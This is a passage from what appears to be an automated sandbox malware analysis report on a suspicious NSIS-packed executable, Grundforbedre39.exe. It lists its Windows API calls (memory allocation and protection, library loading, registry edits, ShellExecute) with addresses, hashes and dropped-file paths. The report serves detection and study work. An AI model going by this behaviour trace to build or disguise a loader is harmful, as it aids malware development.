                                                                                        • Part of subcall function 00405179: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00403160), ref: 004051D4
                                                                                        • Part of subcall function 00405179: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll), ref: 004051E6
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                                                      • LoadLibraryExW.KERNELBASE(00000000,?,?,00000001,?), ref: 00401FFF
                                                                                      • FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,00000001,?), ref: 0040207C
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 334405425-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000696,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsoA79F.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3677997916-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000696,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                                                                      Similarity
                                                                                      • API ID: CloseDeleteOpenValue
                                                                                      • String ID:
                                                                                      • API String ID: 849931509-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: ShowWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1268545403-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(?,?,?,004032D3,00000009), ref: 00406406
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                                                                        • Part of subcall function 00406384: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040639B
                                                                                        • Part of subcall function 00406384: wsprintfW.USER32 ref: 004063D6
                                                                                        • Part of subcall function 00406384: LoadLibraryExW.KERNELBASE(?,00000000,?), ref: 004063EA
                                                                                      Similarity
                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2547128583-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                      Similarity
                                                                                      • API ID: Window$EnableShow
                                                                                      • String ID:
                                                                                      • API String ID: 1136574915-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Grundforbedre39.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00405BF3
                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00405C15
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCreate
                                                                                      • String ID:
                                                                                      • API String ID: 415043291-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,0040325D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004056CB
                                                                                      • GetLastError.KERNEL32 ref: 004056D9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1375471231-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • VirtualAlloc.KERNELBASE(00000000), ref: 10002963
                                                                                      • GetLastError.KERNEL32 ref: 10002A6A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1146159756.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1146123851.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.1146198520.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.1146237766.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocErrorLastVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 497505419-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 0040168E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileMove
                                                                                      • String ID:
                                                                                      • API String ID: 3562171763-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                                                                        • Part of subcall function 00405F61: wsprintfW.USER32 ref: 00405F6E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointerwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 327478801-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileStringWrite
                                                                                      • String ID:
                                                                                      • API String ID: 390214022-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401741
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: PathSearch
                                                                                      • String ID:
                                                                                      • API String ID: 2203818243-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,000000FF,?,0040321F,00000000,00000000,00403076,000000FF,?,00000000,00000000,00000000), ref: 00405C86
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID:
                                                                                      • API String ID: 2738559852-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(00000000,00000696,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID:
                                                                                      • API String ID: 71445658-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,004031ED,00000000,0040BEA0,?,0040BEA0,?,000000FF,?,00000000), ref: 00405CB5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • VirtualProtect.KERNELBASE(1000405C,?,?,1000404C), ref: 100027E5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1146159756.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1146123851.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.1146198520.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.1146237766.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402310
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileString
                                                                                      • String ID:
                                                                                      • API String ID: 1096422788-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040413C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,?,00000001,00403F3F), ref: 00404121
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00403230
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00403ED8), ref: 0040410A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallbackDispatcherUser
                                                                                      • String ID:
                                                                                      • API String ID: 2492992576-0
                                                                                      • Opcode ID: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                                                      • Instruction ID: 8b53a25d375a508ca0f68064fdc939b5f25de369c98bd294fc40859475f67141
                                                                                      • Opcode Fuzzy Hash: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                                                      • Instruction Fuzzy Hash: 02A01132808000ABCA028BA0EF08C0ABB22BBB8300B008A3AB2008003082320820EB0A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404B0D
                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404B18
                                                                                      • GlobalAlloc.KERNEL32(?,?), ref: 00404B62
                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404B75
                                                                                      • SetWindowLongW.USER32(?,?,004050ED), ref: 00404B8E
                                                                                      • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404BA2
                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BB4
                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404BCA
                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BD6
                                                                                      • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404BE8
                                                                                      • DeleteObject.GDI32(00000000), ref: 00404BEB
                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C16
                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C22
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CB8
                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CE3
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF7
                                                                                      • GetWindowLongW.USER32(?,?), ref: 00404D26
                                                                                      • SetWindowLongW.USER32(?,?,00000000), ref: 00404D34
                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404D45
                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E42
                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EA7
                                                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00404EBC
                                                                                      • SendMessageW.USER32(?,00000420,00000000,?), ref: 00404EE0
                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F00
                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404F15
                                                                                      • GlobalFree.KERNEL32(?), ref: 00404F25
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404F9E
                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00405047
                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405056
                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00405076
                                                                                      • ShowWindow.USER32(?,00000000), ref: 004050C4
                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 004050CF
                                                                                      • ShowWindow.USER32(00000000), ref: 004050D6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                      • String ID: $M$N
                                                                                      • API String ID: 1638840714-813528018
                                                                                      • Opcode ID: 04f3f42b2e655a6bf1bbe546ad9d96aad2a2205ad87ede7fab540f4b471b76d2
                                                                                      • Instruction ID: 2f8963ba0b06e8e3d6cb077b811a33c65d2f4829f178f5176880c359a33aa38b
                                                                                      • Opcode Fuzzy Hash: 04f3f42b2e655a6bf1bbe546ad9d96aad2a2205ad87ede7fab540f4b471b76d2
                                                                                      • Instruction Fuzzy Hash: 1D026FB0A00209EFDB249F54DD45AAE7BB5FB84314F10857AF610BA2E1C7799D42CF58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 004045C8
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 004045F2
                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 004046A3
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 004046AE
                                                                                      • lstrcmpiW.KERNEL32(Call,004226E8,00000000,?,?), ref: 004046E0
                                                                                      • lstrcatW.KERNEL32(?,Call), ref: 004046EC
                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046FE
                                                                                        • Part of subcall function 00405743: GetDlgItemTextW.USER32(?,?,00000400,00404735), ref: 00405756
                                                                                        • Part of subcall function 004062AE: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75B23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Grundforbedre39.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406311
                                                                                        • Part of subcall function 004062AE: CharNextW.USER32(?,?,?,00000000), ref: 00406320
                                                                                        • Part of subcall function 004062AE: CharNextW.USER32(?,00000000,75B23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Grundforbedre39.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406325
                                                                                        • Part of subcall function 004062AE: CharPrevW.USER32(?,?,75B23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Grundforbedre39.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406338
                                                                                      • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000001,004206B8,?,?,000003FB,?), ref: 004047C1
                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047DC
                                                                                        • Part of subcall function 00404935: lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 004049D6
                                                                                        • Part of subcall function 00404935: wsprintfW.USER32 ref: 004049DF
                                                                                        • Part of subcall function 00404935: SetDlgItemTextW.USER32(?,004226E8), ref: 004049F2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven$Call$&B
                                                                                      • API String ID: 2624150263-2809856882
                                                                                      • Opcode ID: 8f775fb3ea646de8834d5ea4bf79a40c8e6bb2c6a0c6d8ae6640a0167b8418f2
                                                                                      • Instruction ID: 0d30bce32a668ce4acefc1b856fca7f6450f1747cfb7256993ff8e50c76d0062
                                                                                      • Opcode Fuzzy Hash: 8f775fb3ea646de8834d5ea4bf79a40c8e6bb2c6a0c6d8ae6640a0167b8418f2
                                                                                      • Instruction Fuzzy Hash: 9BA170B1900218AFDB11AFA5DD85AAF77B8EF85314F10843BFA01B62D1D77C89418B6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(004074E4,?,00000001,004074D4,?,?,00000045,000000CD,00000002,000000DF,?), ref: 00402114
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Subfastigiate\Felaheen\Tilb, xrefs: 00402154
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInstance
                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Subfastigiate\Felaheen\Tilb
                                                                                      • API String ID: 542301482-2699030423
                                                                                      • Opcode ID: ca950f7afeac7727567225d74bb161ffe9235428eb8415ca3734983ba85d589a
                                                                                      • Instruction ID: 3ca7e19c9ce8fc1ac7a66f6cc25710137151f8511148443d739b2fd9411afead
                                                                                      • Opcode Fuzzy Hash: ca950f7afeac7727567225d74bb161ffe9235428eb8415ca3734983ba85d589a
                                                                                      • Instruction Fuzzy Hash: C6412D71A00204AFCF00DFA4CD88AAD7BB5FF48314B2045BAF515EB2D1DB799A41CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404319
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040432D
                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040434A
                                                                                      • GetSysColor.USER32(?), ref: 0040435B
                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404369
                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404377
                                                                                      • lstrlenW.KERNEL32(?), ref: 0040437C
                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404389
                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040439E
                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 004043F7
                                                                                      • SendMessageW.USER32(00000000), ref: 004043FE
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404429
                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040446C
                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 0040447A
                                                                                      • SetCursor.USER32(00000000), ref: 0040447D
                                                                                      • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 00404492
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040449E
                                                                                      • SetCursor.USER32(00000000), ref: 004044A1
                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 004044D0
                                                                                      • SendMessageW.USER32(?,00000000,00000000), ref: 004044E2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                      • String ID: Call$N$open
                                                                                      • API String ID: 3615053054-2563687911
                                                                                      • Opcode ID: 0ecf00cceb9638254d38438ef4a41cc97479c5511747606477027e2e03a273fe
                                                                                      • Instruction ID: 22110145f907261e11c2f5d787c062fb689e5c30422f2648b08f84481e86c76f
                                                                                      • Opcode Fuzzy Hash: 0ecf00cceb9638254d38438ef4a41cc97479c5511747606477027e2e03a273fe
                                                                                      • Instruction Fuzzy Hash: 567184B1900209BFDB109F60DD45B6A7B69FB94354F00843AFB01BA2D0C778AD51DFA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                      • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                      • String ID: F
                                                                                      • API String ID: 941294808-1304234792
                                                                                      • Opcode ID: e8f64da504af091a1ac74c49f612a2602db3c4ea19621cede117ebbb55f272a6
                                                                                      • Instruction ID: 0e42b5f20bdf07c2dc1b789da504779860c4ba9591388ef730275887389fb1b0
                                                                                      • Opcode Fuzzy Hash: e8f64da504af091a1ac74c49f612a2602db3c4ea19621cede117ebbb55f272a6
